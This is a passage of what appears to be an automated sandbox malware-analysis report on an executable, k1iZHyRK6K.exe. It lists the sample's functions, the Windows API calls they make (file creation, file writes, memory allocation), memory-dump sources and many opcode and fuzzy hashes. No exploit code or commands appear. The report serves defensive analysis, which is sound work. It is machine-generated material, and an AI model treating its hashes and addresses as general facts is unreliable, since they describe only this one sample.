Instruction Fuzzy Hash: 2E81B230619A4D4FEB68DF18C8597F937E1FB59311F00427EE84EC72A2CA75A945CB81

Function 00007FFD9B879D6E Relevance: 1.7, APIs: 1, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFD9B879E99

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 99b2db4d1227970335e6f804e0fc82a30f5059d67ea92b2c8b519b021007fad5
Instruction ID: 7daec80168261c9e7c99e3414b23a04a1cad2c6ef4129d47eb508ac2cbefd9f4
Opcode Fuzzy Hash: 99b2db4d1227970335e6f804e0fc82a30f5059d67ea92b2c8b519b021007fad5
Instruction Fuzzy Hash: 7B51E53090DB988FDB59DF58D845AA97FF0EF5A320F1442AFE089D3252C774A841CB82

Function 00007FFD9B879EDD Relevance: 1.6, APIs: 1, Instructions: 132
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 00007FFD9B879FB7

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 697989e5ea923a5b97962894f745cf33de6f9246a22d324d3fccc83a848242c4
Instruction ID: 0300ad871828c50a2d2267df5701d91293b0d8bf8a93a49f7bc82abc4d0fe319
Opcode Fuzzy Hash: 697989e5ea923a5b97962894f745cf33de6f9246a22d324d3fccc83a848242c4
Instruction Fuzzy Hash: 4A41A231A0CA5C8FDB58DF58D8597B9BBE1FB99321F04826FD049D3292CB74A845CB81

Function 00007FFD9B87AF18 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 00007FFD9B87AF9F

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 1bfa3bcd88ea641e200ab944f7ddfd1bf528d89b8e2da2ee9f15838a87030aab
Instruction ID: 6028498b1f8907121643b40cc9a359588bd266ec3ab1f6366b9808f3dc345e75
Opcode Fuzzy Hash: 1bfa3bcd88ea641e200ab944f7ddfd1bf528d89b8e2da2ee9f15838a87030aab
Instruction Fuzzy Hash: A4218071A08A0C9FDB58EBA8D849BF9BBF1FF99321F00422FD049D3251DB7164568B81

Function 00007FFD9B87B1D4 Relevance: 1.4, APIs: 1, Instructions: 125
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FFD9B87B288

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3790b3eecbbde5a1e7641c8f3962cc6cd89a815232ca5cc89218a71f822825fa
Instruction ID: 62ceb079cd380e309e58f1a68d84e64cd81a144bbcd80df48bd87a5f90b22f2a
Opcode Fuzzy Hash: 3790b3eecbbde5a1e7641c8f3962cc6cd89a815232ca5cc89218a71f822825fa
Instruction Fuzzy Hash: C2315A31A0CA8C8FDB1CEB6C9C567F87BF1EB5A321F04426FD049D3292DA656806C781

Non-executed Functions

Function 00007FFD9B8848EE Relevance: 1.3, Instructions: 1275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716721251.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ae964f2a3daedfb90e60f36983a47dd79f3b8f6428821f14c3ab36df6c6f9d
Instruction ID: ee79e97107143250467d2f2b1dacb8ad5be21067f32221666a8034218ebabae1
Opcode Fuzzy Hash: b5ae964f2a3daedfb90e60f36983a47dd79f3b8f6428821f14c3ab36df6c6f9d
Instruction Fuzzy Hash: 78B29231A18A4A4FE75ADF58C865AB9F7B1FF58300F4146FAC01E87196DA3879C1CB81

Function 00007FFD9B9EFD66 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717527837.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b9e0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e288bfd73e265bf495a416913bea9e035ec6475214cad69d1132a1cf92ab90b
Instruction ID: 951b94d92738fe6c38caa18379f96960dd4e07f93afc922dc1933dd797caefc8
Opcode Fuzzy Hash: 3e288bfd73e265bf495a416913bea9e035ec6475214cad69d1132a1cf92ab90b
Instruction Fuzzy Hash: 16F1C830A19A8D8FEBA8DF28C8657E93BE1FF55310F14426EE84DC7295DB3499418B81

Function 00007FFD9B9F331A Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717527837.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b9e0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f63bd97df0ae633c9d1959e036ef099087f2a80525ace87cae7e22c1d5185d25
Instruction ID: 0469fb844913dff7308e7ee06ec58f30b004891cbcc86c3adb710a5c7fc5c596
Opcode Fuzzy Hash: f63bd97df0ae633c9d1959e036ef099087f2a80525ace87cae7e22c1d5185d25
Instruction Fuzzy Hash: 58511A93F1F9C95BFB668AB818352756F90DF42260B0D40FBD4D8871EB9A4DAE05C341

Function 00007FFD9B9F33AA Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717527837.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b9e0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c2747393d2cf7a48d79ce7ee1bc2578a9a82e818f79caa944d4a1adbedde288
Instruction ID: 86a872170de193faa413a5f0998e1232535bf1fe0f44ad0def22fab230fa4c62
Opcode Fuzzy Hash: 9c2747393d2cf7a48d79ce7ee1bc2578a9a82e818f79caa944d4a1adbedde288
Instruction Fuzzy Hash: EF41F993F4F8C91BFB674AB818792B56F90DF46160B0D40B7D8D8871EB9A4DAE05C341

Analysis Process: k1iZHyRK6K.exePID: 2312, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B8A1222 Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccad427112251d567efbf7c6b5ef39f1c97443bd7d8a27e4ae229d107b75ab28
Instruction ID: 591669d9f6d13832284e89e378c8232fc902081117082282a8ec1d81dab704e5
Opcode Fuzzy Hash: ccad427112251d567efbf7c6b5ef39f1c97443bd7d8a27e4ae229d107b75ab28
Instruction Fuzzy Hash: A6C13A20B1E68E0FE769BB6884656B57BE2EF5B310F0540BAD48AC71E7DD1CA842C351

Function 00007FFD9B8A276D Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a6e331ebb94a24602372f53e843dd394eb751cb0becc9b0bdf9f9a91d00980e
Instruction ID: b7572ba81dc8b26154f6ae6cf2da9008a82ef1ffa348fcd648c3dc100b48ca65
Opcode Fuzzy Hash: 3a6e331ebb94a24602372f53e843dd394eb751cb0becc9b0bdf9f9a91d00980e
Instruction Fuzzy Hash: 4B220321B0D64E8FE379AF9889216B877E1EF4A310F0600B9D45D875E7DE2CAD078761

Function 00007FFD9B8A48F1 Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94567b09ab99982d65d0a814f13e8dcc139ecca617dbee695ceabd80906ba1c2
Instruction ID: 363b15264d5b45724eec254b065dc215d079a91af9bfe238e31aa9336639233e
Opcode Fuzzy Hash: 94567b09ab99982d65d0a814f13e8dcc139ecca617dbee695ceabd80906ba1c2
Instruction Fuzzy Hash: 14F1E661F1E90E4FEBB4EB9884A667977E1EF9C300B59407ED00EC71A2DE3879418791

Function 00007FFD9B8A34AF Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e9a2e78b6a1ca9aa3a9673c6f77dbfd2da3e62edc420ca8f19decf9a7218506
Instruction ID: 5abccbf7010bb2a9ddd2dd7a3d721ddc1c418087f324db6c37627e334acabc83
Opcode Fuzzy Hash: 0e9a2e78b6a1ca9aa3a9673c6f77dbfd2da3e62edc420ca8f19decf9a7218506
Instruction Fuzzy Hash: A7E10622B0995D8EE715BBACFC65AECB7A0FF88325F1002BBD04DC7197DE2464468750

Function 00007FFD9B8A34D3 Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c00dabf9437392fac5c07c4edfe5542c7a2f084033916b4012e9b6c23b06ec8
Instruction ID: a4eb5e8d4039106761aa3912f1a0aab4eec12bd35759f11088a8230f5519c58e
Opcode Fuzzy Hash: 9c00dabf9437392fac5c07c4edfe5542c7a2f084033916b4012e9b6c23b06ec8
Instruction Fuzzy Hash: A9D1E422B0992D8EE755BBACFC65AECB7A0FF89325F0002BBD04DC7197DE2464468751

Function 00007FFD9B8A35D3 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0002d5aa394661a933da5bc7d4f25f76503754387d6a2f5b48db5114554fbea
Instruction ID: 6dc6ba6d45ba1da77ca7083894fd3bd1bb80ed8d1418bbe5db4b18fc72e4d0bf
Opcode Fuzzy Hash: a0002d5aa394661a933da5bc7d4f25f76503754387d6a2f5b48db5114554fbea
Instruction Fuzzy Hash: 37B1C321F1995D8EEB54FBA8EC65AECBBB0FF88311F0002BBD00CD7196DE2468458751

Function 00007FFD9B8A2640 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b601f4a7d180a152f22b0310a495dda48676c2578c29159a2e9cac94dc96468
Instruction ID: ec5ee874b5cbd0a7b827c94c1f0cd55a24184fb3e97568060223228fd40a40d1
Opcode Fuzzy Hash: 6b601f4a7d180a152f22b0310a495dda48676c2578c29159a2e9cac94dc96468
Instruction Fuzzy Hash: D1B10531B1DA4E4BE768EF98C8256B973A1EF89314F5440B9D00EC72D7DE29AC42C761

Function 00007FFD9B8A0EB5 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ef769b13a2cf6a6862a9eba3e5d0e227155a5ed4bf8827d1a4dea9e69cb824
Instruction ID: 88d18ca65f0771fec26b3f5a0050f4b00b86ecf277ffde0c5a85a32ba997e2ac
Opcode Fuzzy Hash: 68ef769b13a2cf6a6862a9eba3e5d0e227155a5ed4bf8827d1a4dea9e69cb824
Instruction Fuzzy Hash: D981C531B19E4D4FDBA8EBA884656B8B7E2EF9D710F05017AE04ED32D6CE246802C751

Function 00007FFD9B8A39E9 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7cd5264cb01ed14d3725b3dfadaa26a89f1bacbed196c6e54106ab7df7b5db
Instruction ID: d539b3744969710a84edf853d43e84cfd0baa7e2dac2d656c8aad6c7c02d0700
Opcode Fuzzy Hash: 5c7cd5264cb01ed14d3725b3dfadaa26a89f1bacbed196c6e54106ab7df7b5db
Instruction Fuzzy Hash: 7C81FF70E09A1D8FDB54EFA8C8A5AAD77B1FF58305F5000B9D00DE7295DB38A981CB51

Function 00007FFD9B8A4064 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59cd072cb50215c6d718fcd692d308fab563e256e7fe90387781e305ac72d126
Instruction ID: 855a27797d036ff0cc090dc85af496e733e5b1aaecb8a6e0c99e229eb3d48fef
Opcode Fuzzy Hash: 59cd072cb50215c6d718fcd692d308fab563e256e7fe90387781e305ac72d126
Instruction Fuzzy Hash: 10510842B0F7D90FE76647AC28751A97FA2DF5B26071D42FFD0C88A1E7EC09590A8352

Function 00007FFD9B8A0B85 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3c7af9cede44734e9f7cc8f94b7a8ec24ee936814436950bf24dba9d8d6183
Instruction ID: fff2bbdd33c8078adafd8bd88773ee4914ba6599b5f2d5bd87de9d25ceee3da3
Opcode Fuzzy Hash: 5c3c7af9cede44734e9f7cc8f94b7a8ec24ee936814436950bf24dba9d8d6183
Instruction Fuzzy Hash: 62412A21B19A490FD799FB7898A5AB573E2EF98304B1541F6E01DC32E7DD28AC428351

Function 00007FFD9B8A0CDA Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ae7826c8bc725bd0a3c5c9e9c8be7438709d8a3f678c1fb5700f3c634baa6de
Instruction ID: 6c7f7e74791df2e728b7688d3ba901b69103858dc386a3b2c590887fbe257864
Opcode Fuzzy Hash: 5ae7826c8bc725bd0a3c5c9e9c8be7438709d8a3f678c1fb5700f3c634baa6de
Instruction Fuzzy Hash: 89310D61B1DB480FE759A76CA4166B97BD1EF99314F0401BFF04EC31C7DD2868028396

Function 00007FFD9B8A50A9 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2151c15362314afcaa11f9092ea175645329be7a0f921f8a338603833e7df5e5
Instruction ID: 7447f670b9bfb87298755ea8f91578bc030a928fe2a8d8a1e26e0bb65786dede
Opcode Fuzzy Hash: 2151c15362314afcaa11f9092ea175645329be7a0f921f8a338603833e7df5e5
Instruction Fuzzy Hash: 81310521B0EA4D4FDB55EB6858255FC7BF1EF88300B0A01FBD408D72D7DE2898458352

Function 00007FFD9B8A0A76 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0475721cd4c91fa12ea8e27d974404506be9aeaca841b52bae40b509af92851f
Instruction ID: 448feec4c351e41c326c51c2f4b55a39dce7ad357b971a6fcceef940198246a3
Opcode Fuzzy Hash: 0475721cd4c91fa12ea8e27d974404506be9aeaca841b52bae40b509af92851f
Instruction Fuzzy Hash: 0C31B231A1991D8FEB65EBB8C4696E9BBF0FF18300F15457AD00DE31A1DA38A985CB50

Function 00007FFD9B8A2488 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0481c8182cbc5a17d2666728bd114220dd2d305120c80c7947be7bf6a9742f20
Instruction ID: e2a967a4bca6b6ce278319299e44e13aaddf664e1b676aab9b7b17e843a38cfe
Opcode Fuzzy Hash: 0481c8182cbc5a17d2666728bd114220dd2d305120c80c7947be7bf6a9742f20
Instruction Fuzzy Hash: A3213631F1880D4BEB58FB9C98256FDB7E2EB98310F1401BBE41DD3285DD28A8414791

Function 00007FFD9B8A0860 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c94c22751b07d2e067d32bea95b0e8aaf06b64684e4b58f22ff361c302742ffe
Instruction ID: 0a068f66136ef4420f62850cec7d72dda82ddda1a000b77ac9ef9c51f59fe141
Opcode Fuzzy Hash: c94c22751b07d2e067d32bea95b0e8aaf06b64684e4b58f22ff361c302742ffe
Instruction Fuzzy Hash: 2321873171E7CC0FDB46AB7894B14E83BE0EF89254F0401BBE08DCB1A3CD19A5028351

Function 00007FFD9B8A09C1 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599d934aaf479031212188da1c23c7a06b816be7b572fa7b9f809d7b014b044a
Instruction ID: f626043892bc96c34727236e908ccc81e2a389afff5ab6530f4a54a8b583f988
Opcode Fuzzy Hash: 599d934aaf479031212188da1c23c7a06b816be7b572fa7b9f809d7b014b044a
Instruction Fuzzy Hash: 3C112412B2EE4F0FF7B8A7E814796B53AC1DF99A00B0A417AD40CC31A7DD18B90243A1

Function 00007FFD9B8A4EB1 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6756c8e36ec2741dd072fb7b4251ca9c5b00c8e2a65c1a7e5cd2f3a52ed7500c
Instruction ID: 197ba2dc7c56df1293f2c98c0622193868380e1f0baad02f3754cd3a2df22da8
Opcode Fuzzy Hash: 6756c8e36ec2741dd072fb7b4251ca9c5b00c8e2a65c1a7e5cd2f3a52ed7500c
Instruction Fuzzy Hash: 47116A2194F2C90FDB1357B46C655E27FB4AF47224B0E01EBD898CB0A3D54D5A5AC362

Function 00007FFD9B8A089D Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5627d557f7b191d54bae4d89ba9f75dacbe145bd14a6385d908bc5bd8d0f084
Instruction ID: c6d1cc0a361247014807ce6a947991c56676ed4c39c3fc1e439c28a75785f52c
Opcode Fuzzy Hash: f5627d557f7b191d54bae4d89ba9f75dacbe145bd14a6385d908bc5bd8d0f084
Instruction Fuzzy Hash: 3C11783171DB8C0FD785EB2884B05A97BE0EF98350F01057FE08DC72B2DE29A6428312

Function 00007FFD9B8A09E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ecfd1d31e6923e87d06001f6a93fdebc2d8c40578b4a95f7913edb001c66d8
Instruction ID: 1e52e21390cd5e2e6dbb33ce6aeabac99880a31bb2dcd146ac73f76406755bbf
Opcode Fuzzy Hash: 72ecfd1d31e6923e87d06001f6a93fdebc2d8c40578b4a95f7913edb001c66d8
Instruction Fuzzy Hash: 6201D412B2ED0F0BE2B866AC28696B625C5DFDCA50B46023AE50DC2296DD59B94243A1

Function 00007FFD9B8A0E39 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad4cd3fb73bfe2904a707fbc67a1dbfff7472af17c58b0308ea54499ad6d1906
Instruction ID: 12bc673890c2e9845e5a3a7131085dd5d2ad4141d3a9f1ad3d70d27c704835f9
Opcode Fuzzy Hash: ad4cd3fb73bfe2904a707fbc67a1dbfff7472af17c58b0308ea54499ad6d1906
Instruction Fuzzy Hash: B0012B20B0E6C80FE347E37898A86B43FD1AF87215B0A41F6E44CCB0B7C9584D46C312

Function 00007FFD9B8A4F11 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c81dd5379325a2810bf9fa7bce40e82bbfe984f5a7720458f4277c1e198dace
Instruction ID: 1fd67bc925474739f3bb85ba3d0dff8c22936b07ae5012c775d3d471afe5ea8d
Opcode Fuzzy Hash: 4c81dd5379325a2810bf9fa7bce40e82bbfe984f5a7720458f4277c1e198dace
Instruction Fuzzy Hash: 72017D30B0E1860AEB3923B854713F82B11DF85314F0A01F9D45CCE0E7CD1D29928371

Function 00007FFD9B8A518D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8edc9bdcbc5cfe2a46123b809133ca35dc6b1aa2bac815ddbe47f90e1b85e54
Instruction ID: 0b5d8d66950e9847789c2685093d82f53a9e68026b3399f4219a113353085569
Opcode Fuzzy Hash: e8edc9bdcbc5cfe2a46123b809133ca35dc6b1aa2bac815ddbe47f90e1b85e54
Instruction Fuzzy Hash: 9DF0C831F0540E8BEB64EB9C98651FD77F1EF8C310B150475D40DE3295DD24AE8287A1

Function 00007FFD9B8A0DF6 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075a733add198e52836a7c1130d02e8105c67ced0c7e8fb966f3051edac631b5
Instruction ID: 640905c52bc330964d6a3d91f94d8952293ad2d8d7451afbc2605f71e0667724
Opcode Fuzzy Hash: 075a733add198e52836a7c1130d02e8105c67ced0c7e8fb966f3051edac631b5
Instruction Fuzzy Hash: 1DE02B7290E64C1EEB48AA59FC17CF67B98DA87234B00015FF19DC1163F11265638255

Function 00007FFD9B8A4D65 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e915fb683dca70ca6f9d94e9f251f21b1ac819c1ee871e17072e4e3bb90445
Instruction ID: 4dd87c8862716809aed0ad5b4121e72422b7050e8ec7d5ea283e9b914a0562c7
Opcode Fuzzy Hash: e5e915fb683dca70ca6f9d94e9f251f21b1ac819c1ee871e17072e4e3bb90445
Instruction Fuzzy Hash: 43E0263294EE0D8BEF98AB999C242E937A4FF4D308F050AAEE05CC7191D7365A55C345

Function 00007FFD9B8A3C81 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1757873219.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b8a0000_k1iZHyRK6K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec90db60994e02cb9fd03a7188af3fb9d18ff14cd5a8d81712b7afb4832df18
